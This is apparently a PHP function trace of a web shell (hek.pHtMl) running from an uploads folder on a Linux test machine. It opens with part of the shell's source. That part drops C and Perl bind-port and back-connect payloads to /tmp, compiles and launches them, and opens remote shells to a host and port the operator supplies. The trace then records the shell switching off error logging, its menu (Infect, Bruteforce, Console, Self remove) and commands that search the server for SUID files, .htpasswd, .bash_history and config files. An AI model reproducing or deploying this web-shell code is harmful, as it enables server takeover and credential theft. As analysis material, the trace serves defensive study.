\r\n\tPort: Password: Using: \r\n\t
\r\n\t
\r\n\tBack-connect to
\r\n\tServer: Port: Using: \r\n\t

";\r\n\tif(isset($_POST[\'p1\'])) {\r\n\t\tfunction cf($f,$t) {\r\n\t\t\t$w=@fopen($f,"w") or @function_exists(\'file_put_contents\');\r\n\t\t\tif($w)\t{\r\n\t\t\t\t@fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));\r\n\t\t\t\t@fclose($w);\r\n\t\t\t}\r\n\t\t}\r\n\t\tif($_POST[\'p1\'] == \'bpc\') {\r\n\t\t\tcf("/tmp/bp.c",$bind_port_c);\r\n\t\t\t$apple = ex("gcc -o /tmp/bp /tmp/bp.c");\r\n\t\t\t@unlink("/tmp/bp.c");\r\n\t\t\t$apple .= ex("/tmp/bp ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n\t\t\techo "
$apple".ex("ps aux | grep bp")."
";\r\n\t\t}\r\n\t\tif($_POST[\'p1\'] == \'bpp\') {\r\n\t\t\tcf("/tmp/bp.pl",$bind_port_p);\r\n\t\t\t$apple = ex(which("perl")." /tmp/bp.pl ".$_POST[\'p2\']." &");\r\n\t\t\techo "
$apple".ex("ps aux | grep bp.pl")."
";\r\n\t\t}\r\n\t\tif($_POST[\'p1\'] == \'bcc\') {\r\n\t\t\tcf("/tmp/bc.c",$back_connect_c);\r\n\t\t\t$apple = ex("gcc -o /tmp/bc /tmp/bc.c");\r\n\t\t\t@unlink("/tmp/bc.c");\r\n\t\t\t$apple .= ex("/tmp/bc ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n\t\t\techo "
$apple".ex("ps aux | grep bc")."
";\r\n\t\t}\r\n\t\tif($_POST[\'p1\'] == \'bcp\') {\r\n\t\t\tcf("/tmp/bc.pl",$back_connect_p);\r\n\t\t\t$apple = ex(which("perl")." /tmp/bc.pl ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n\t\t\techo "
$apple".ex("ps aux | grep bc.pl")."
";\r\n\t\t}\r\n\t}\r\n\techo \'
\';\r\n\thardFooter();\r\n}\r\nif( empty($_POST[\'a\']) )\r\n\tif(isset($_action) && function_exists(\'action\' . $_action))\r\n\t\t$_POST[\'a\'] = $_action;\r\n\telse\r\n\t\t$_POST[\'a\'] = \'FilesMan\';\r\nif( !empty($_POST[\'a\']) && function_exists(\'action\' . $_POST[\'a\']) )\r\n\tcall_user_func(\'action\' . $_POST[\'a\']);\r\n' /var/www/html/uploads/hek.pHtMl(1) : runtime-created function 1 0 3 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 2 $_password = '' 3 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 3 $_agent = TRUE 3 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 4 $_unicode = 'UTF-8' 3 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 6 $_action = 'FilesMan' 4 10 0 0.009081 1307728 md5 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 8 1 'python-requests/2.25.1' 4 10 1 0.009108 1307824 4 10 R 'ecd862b3d0595af0a0b03f511e800938' 3 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 8 $Drupal = 'ecd862b3d0595af0a0b03f511e800938' 4 11 0 0.009145 1307792 md5 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 9 1 'localhost' 4 11 1 0.009161 1307888 4 11 R '421aa90e079fa326b6494f812ad13e79' 4 12 0 0.009181 1307792 md5 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 10 1 'localhost' 4 12 1 0.009195 1307888 4 12 R '421aa90e079fa326b6494f812ad13e79' 4 13 0 0.009210 1307856 prototype 1 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 10 2 '421aa90e079fa326b6494f812ad13e79key' 'ecd862b3d0595af0a0b03f511e800938' 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 377 _COOKIE['421aa90e079fa326b6494f812ad13e79key'] = 'ecd862b3d0595af0a0b03f511e800938' 5 14 0 0.009250 1308232 setcookie 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 378 2 '421aa90e079fa326b6494f812ad13e79key' 'ecd862b3d0595af0a0b03f511e800938' 5 14 1 0.009276 1308432 5 14 R TRUE 4 13 1 0.009290 1308368 3 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 13 _POST['charset'] = 'UTF-8' 4 15 0 0.009316 1308744 ini_set 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 22 2 'error_log' NULL 4 15 1 0.009335 1308816 4 15 R '' 4 16 0 0.009349 1308744 ini_set 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 23 2 'log_errors' 0 4 16 1 0.009366 1308816 4 16 R '1' 4 17 0 0.009379 1308744 ini_set 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 24 2 'max_execution_time' 0 4 17 1 0.009398 1308848 4 17 R '30' 4 18 0 0.009412 1308744 set_time_limit 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 25 1 0 4 18 1 0.009430 1308808 4 18 R FALSE 4 19 0 0.009444 1308776 define 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 28 2 'VERSION' '5.0.3' 4 19 1 0.009461 1308880 4 19 R TRUE 4 20 0 0.009474 1308808 get_magic_quotes_gpc 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 29 0 4 20 1 0.009488 1308808 4 20 R FALSE 4 21 0 0.009502 1308808 md5 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 43 1 'localhost' 4 21 1 0.009516 1308904 4 21 R '421aa90e079fa326b6494f812ad13e79' 4 22 0 0.009531 1308808 md5 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 44 1 'localhost' 4 22 1 0.009546 1308904 4 22 R '421aa90e079fa326b6494f812ad13e79' 3 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 44 _COOKIE['421aa90e079fa326b6494f812ad13e79ajax'] = TRUE 4 23 0 0.009578 1308872 substr 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 70 3 'Linux' 0 3 4 23 1 0.009594 1309000 4 23 R 'Lin' 4 24 0 0.009607 1308904 strtolower 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 70 1 'Lin' 4 24 1 0.009622 1308968 4 24 R 'lin' 3 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 73 $os = 'nix' 4 25 0 0.009647 1308872 ini_get 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 74 1 'safe_mode' 4 25 1 0.009662 1308904 4 25 R FALSE 3 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 74 $safe_mode = FALSE 4 26 0 0.009689 1308872 error_reporting 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 76 1 0 4 26 1 0.009703 1308912 4 26 R 0 4 27 0 0.009716 1308872 ini_get 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 77 1 'disable_functions' 4 27 1 0.009731 1309352 4 27 R 'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,' 3 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 77 $disable_functions = 'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,' 4 28 0 0.009782 1309320 getcwd 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 78 0 4 28 1 0.009800 1309368 4 28 R '/var/www/html/uploads' 3 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 78 $home_cwd = '/var/www/html/uploads' 4 29 0 0.009828 1309368 getcwd 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 81 0 4 29 1 0.009842 1309416 4 29 R '/var/www/html/uploads' 3 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 81 $cwd = '/var/www/html/uploads' 3 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 87 $cwd .= '/' 4 30 0 0.009883 1309416 function_exists 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 278 1 'posix_getpwuid' 4 30 1 0.009899 1309456 4 30 R TRUE 4 31 0 0.009912 1309416 function_exists 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 279 1 'posix_getgrgid' 4 31 1 0.009927 1309456 4 31 R TRUE 3 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 281 $var_exec = 'exec' 3 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 282 $var_passthru = 'passthru' 3 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 283 $var_system = 'system' 3 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 284 $var_shell_exec = 'shell_exec' 3 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 633 $aliases = ['List dir' => 'ls -lha', 'list file attributes on a Linux second extended file system' => 'lsattr -va', 'show opened ports' => 'netstat -an | grep -i listen', 'process status' => 'ps aux', 'Find' => '', 'find all suid files' => 'find / -type f -perm -04000 -ls', 'find suid files in current dir' => 'find . -type f -perm -04000 -ls', 'find all sgid files' => 'find / -type f -perm -02000 -ls', 'find sgid files in current dir' => 'find . -type f -perm -02000 -ls', 'find config.inc.php files' => 'find / -type f -name config.inc.php', 'find config* files' => 'find / -type f -name "config*"', 'find config* files in current dir' => 'find . -type f -name "config*"', 'find all writable folders and files' => 'find / -perm -2 -ls', 'find all writable folders and files in current dir' => 'find . -perm -2 -ls', 'find all service.pwd files' => 'find / -type f -name service.pwd', 'find service.pwd files in current dir' => 'find . -type f -name service.pwd', 'find all .htpasswd files' => 'find / -type f -name .htpasswd', 'find .htpasswd files in current dir' => 'find . -type f -name .htpasswd', 'find all .bash_history files' => 'find / -type f -name .bash_history', 'find .bash_history files in current dir' => 'find . -type f -name .bash_history', 'find all .fetchmailrc files' => 'find / -type f -name .fetchmailrc', 'find .fetchmailrc files in current dir' => 'find . -type f -name .fetchmailrc', 'Locate' => '', 'locate httpd.conf files' => 'locate httpd.conf', 'locate vhosts.conf files' => 'locate vhosts.conf', 'locate proftpd.conf files' => 'locate proftpd.conf', 'locate psybnc.conf files' => 'locate psybnc.conf', 'locate my.conf files' => 'locate my.conf', 'locate admin.php files' => 'locate admin.php', 'locate cfg.php files' => 'locate cfg.php', 'locate conf.php files' => 'locate conf.php', 'locate config.dat files' => 'locate config.dat', 'locate config.php files' => 'locate config.php', 'locate config.inc files' => 'locate config.inc', 'locate config.inc.php' => 'locate config.inc.php', 'locate config.default.php files' => 'locate config.default.php', 'locate config* files ' => 'locate config', 'locate .conf files' => 'locate \'.conf\'', 'locate .pwd files' => 'locate \'.pwd\'', 'locate .sql files' => 'locate \'.sql\'', 'locate .htpasswd files' => 'locate \'.htpasswd\'', 'locate .bash_history files' => 'locate \'.bash_history\'', 'locate .mysql_history files' => 'locate \'.mysql_history\'', 'locate .fetchmailrc files' => 'locate \'.fetchmailrc\'', 'locate backup files' => 'locate backup', 'locate dump files' => 'locate dump', 'locate priv files' => 'locate priv'] 4 32 0 0.010070 1309456 function_exists 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 1745 1 'actionFilesMan' 4 32 1 0.010087 1309496 4 32 R TRUE 3 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 1746 _POST['a'] = 'FilesMan' 4 33 0 0.010115 1309456 function_exists 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 1749 1 'actionFilesMan' 4 33 1 0.010131 1309496 4 33 R TRUE 4 34 0 0.010145 1309416 actionFilesMan 1 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 1750 0 5 35 0 0.010166 1309416 hardHeader 1 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 909 0 6 36 0 0.010186 1312464 htmlspecialchars 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 135 1 '/var/www/html/uploads/' 6 36 1 0.010203 1312656 6 36 R '/var/www/html/uploads/' 6 37 0 0.010218 1312464 htmlspecialchars 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 136 1 'FilesMan' 6 37 1 0.010234 1312656 6 37 R 'FilesMan' 6 38 0 0.010248 1312464 htmlspecialchars 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 137 1 'UTF-8' 6 38 1 0.010263 1312656 6 38 R 'UTF-8' 6 39 0 0.010278 1312464 strpos 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 138 2 NULL '\n' 6 39 1 0.010294 1312536 6 39 R FALSE 6 40 0 0.010308 1312464 htmlspecialchars 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 138 2 NULL 3 6 40 1 0.010323 1312696 6 40 R '' 6 41 0 0.010337 1312464 strpos 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 139 2 NULL '\n' 6 41 1 0.010352 1312536 6 41 R FALSE 6 42 0 0.010365 1312464 htmlspecialchars 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 139 2 NULL 3 6 42 1 0.010384 1312696 6 42 R '' 6 43 0 0.010398 1312464 strpos 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 140 2 NULL '\n' 6 43 1 0.010413 1312536 6 43 R FALSE 6 44 0 0.010426 1312464 htmlspecialchars 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 140 2 NULL 3 6 44 1 0.010440 1312696 6 44 R '' 6 45 0 0.010454 1317584 md5 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 152 1 'localhost' 6 45 1 0.010468 1317680 6 45 R '421aa90e079fa326b6494f812ad13e79' 6 46 0 0.010484 1317584 md5 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 153 1 'localhost' 6 46 1 0.010498 1317680 6 46 R '421aa90e079fa326b6494f812ad13e79' 6 47 0 0.010513 1317584 md5 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 154 1 'localhost' 6 47 1 0.010527 1317680 6 47 R '421aa90e079fa326b6494f812ad13e79' 6 48 0 0.010542 1317584 md5 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 155 1 'localhost' 6 48 1 0.010556 1317680 6 48 R '421aa90e079fa326b6494f812ad13e79' 6 49 0 0.010570 1317584 md5 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 156 1 'localhost' 6 49 1 0.010592 1317680 6 49 R '421aa90e079fa326b6494f812ad13e79' 6 50 0 0.010607 1317584 addslashes 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 168 1 '/uploads/hek.pHtMl' 6 50 1 0.010623 1317616 6 50 R '/uploads/hek.pHtMl' 6 51 0 0.010646 1309504 diskfreespace 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 200 1 '/var/www/html/uploads/' 6 51 1 0.010669 1309536 6 51 R 209137418240 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 200 $freeSpace = 209137418240 6 52 0 0.010698 1309504 disk_total_space 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 201 1 '/var/www/html/uploads/' 6 52 1 0.010715 1309536 6 52 R 232015802368 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 201 $totalSpace = 232015802368 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 202 $totalSpace = 232015802368 6 53 0 0.010756 1309504 php_uname 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 203 1 'r' 6 53 1 0.010772 1309584 6 53 R '5.15.0-60-generic' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 203 $release = '5.15.0-60-generic' 6 54 0 0.010800 1309552 php_uname 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 204 1 's' 6 54 1 0.010815 1309616 6 54 R 'Linux' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 204 $kernel = 'Linux' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 205 $explink = 'http://noreferer.de/?http://www.exploit-db.com/search/?action=search&description=' 6 55 0 0.010856 1309584 strpos 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 206 2 'Linux' 'Linux' 6 55 1 0.010872 1309656 6 55 R 0 6 56 0 0.010885 1309584 substr 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 207 3 '5.15.0-60-generic' 0 6 6 56 1 0.010901 1309712 6 56 R '5.15.0' 6 57 0 0.010914 1309632 urlencode 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 207 1 'Linux Kernel 5.15.0' 6 57 1 0.010929 1309712 6 57 R 'Linux+Kernel+5.15.0' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 207 $explink .= 'Linux+Kernel+5.15.0' 6 58 0 0.010957 1309712 function_exists 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 210 1 'posix_getegid' 6 58 1 0.010973 1309752 6 58 R TRUE 6 59 0 0.010987 1309712 posix_geteuid 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 216 0 6 59 1 0.011006 1309712 6 59 R 33 6 60 0 0.011018 1309712 posix_getpwuid 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 216 1 33 6 60 1 0.011065 1310544 6 60 R ['name' => 'www-data', 'passwd' => 'x', 'uid' => 33, 'gid' => 33, 'gecos' => 'www-data', 'dir' => '/var/www', 'shell' => '/usr/sbin/nologin'] 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 216 $uid = ['name' => 'www-data', 'passwd' => 'x', 'uid' => 33, 'gid' => 33, 'gecos' => 'www-data', 'dir' => '/var/www', 'shell' => '/usr/sbin/nologin'] 6 61 0 0.011110 1310512 posix_getegid 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 217 0 6 61 1 0.011125 1310512 6 61 R 33 6 62 0 0.011137 1310512 posix_getgrgid 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 217 1 33 6 62 1 0.011188 1311176 6 62 R ['name' => 'www-data', 'passwd' => 'x', 'members' => [], 'gid' => 33] 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 217 $gid = ['name' => 'www-data', 'passwd' => 'x', 'members' => [], 'gid' => 33] 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 218 $user = 'www-data' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 219 $uid = 33 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 220 $group = 'www-data' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 221 $gid = 33 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 223 $cwd_links = '' 6 63 0 0.011287 1309792 explode 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 224 2 '/' '/var/www/html/uploads/' 6 63 1 0.011305 1310400 6 63 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => ''] 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 224 $path = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => ''] 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 225 $n = 6 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 226 $i = 0 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 227 $cwd_links .= '/' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 226 $i++ 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 227 $cwd_links .= 'var/' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 226 $i++ 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 227 $cwd_links .= 'www/' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 226 $i++ 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 227 $cwd_links .= 'html/' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 226 $i++ 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 227 $cwd_links .= 'uploads/' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 226 $i++ 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 232 $charsets = [0 => 'UTF-8', 1 => 'Windows-1251', 2 => 'KOI8-R', 3 => 'KOI8-U', 4 => 'cp866'] 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 233 $opt_charsets = '' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 235 $opt_charsets .= '' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 235 $opt_charsets .= '' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 235 $opt_charsets .= '' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 235 $opt_charsets .= '' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 235 $opt_charsets .= '' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 236 $m = ['Sec. Info' => 'SecInfo', 'Files' => 'FilesMan', 'Console' => 'Console', 'Infect' => 'Infect', 'Sql' => 'Sql', 'Php' => 'Php', 'Safe mode' => 'SafeMode', 'String tools' => 'StringTools', 'Bruteforce' => 'Bruteforce', 'Anonymizer' => 'Anonymizer', 'Network' => 'Network'] 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 239 $m['Self remove'] = 'SelfRemove' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 240 $menu = '' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 241 $k = 'Sec. Info' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 242 $menu .= '[ Sec. Info ]' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 241 $k = 'Files' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 242 $menu .= '[ Files ]' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 241 $k = 'Console' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 242 $menu .= '[ Console ]' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 241 $k = 'Infect' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 242 $menu .= '[ Infect ]' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 241 $k = 'Sql' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 242 $menu .= '[ Sql ]' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 241 $k = 'Php' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 242 $menu .= '[ Php ]' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 241 $k = 'Safe mode' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 242 $menu .= '[ Safe mode ]' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 241 $k = 'String tools' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 242 $menu .= '[ String tools ]' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 241 $k = 'Bruteforce' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 242 $menu .= '[ Bruteforce ]' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 241 $k = 'Anonymizer' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 242 $menu .= '[ Anonymizer ]' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 241 $k = 'Network' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 242 $menu .= '[ Network ]' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 241 $k = 'Self remove' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 242 $menu .= '[ Self remove ]' 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 243 $drives = '' 6 64 0 0.012420 1312816 php_uname 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 251 0 6 64 1 0.012436 1312928 6 64 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64' 6 65 0 0.012455 1312928 substr 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 251 3 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64' 0 120 6 65 1 0.012474 1313024 6 65 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64' 6 66 0 0.012493 1312944 php_uname 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 251 0 6 66 1 0.012507 1313056 6 66 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64' 6 67 0 0.012525 1313056 urlencode 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 251 1 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64' 6 67 1 0.012543 1313216 6 67 R 'Linux+osboxes+5.15.0-60-generic+%2366-Ubuntu+SMP+Fri+Jan+20+14%3A29%3A49+UTC+2023+x86_64' 6 68 0 0.012563 1313264 phpversion 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 251 0 6 68 1 0.012577 1313328 6 68 R '7.2.34-37+ubuntu22.04.1+deb.sury.org+1' 6 69 0 0.012593 1313520 date 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 251 1 'Y-m-d H:i:s' 6 69 1 0.012659 1315872 6 69 R '2023-02-12 16:27:27' 6 70 0 0.012678 1315584 viewSize 1 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 251 1 232015802368 7 71 0 0.012695 1315584 sprintf 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 311 2 '%1.2f' 216.08155441284 7 71 1 0.012712 1315968 7 71 R '216.08' 6 70 1 0.012726 1315624 6 70 R '216.08 GB' 6 72 0 0.012740 1315584 viewSize 1 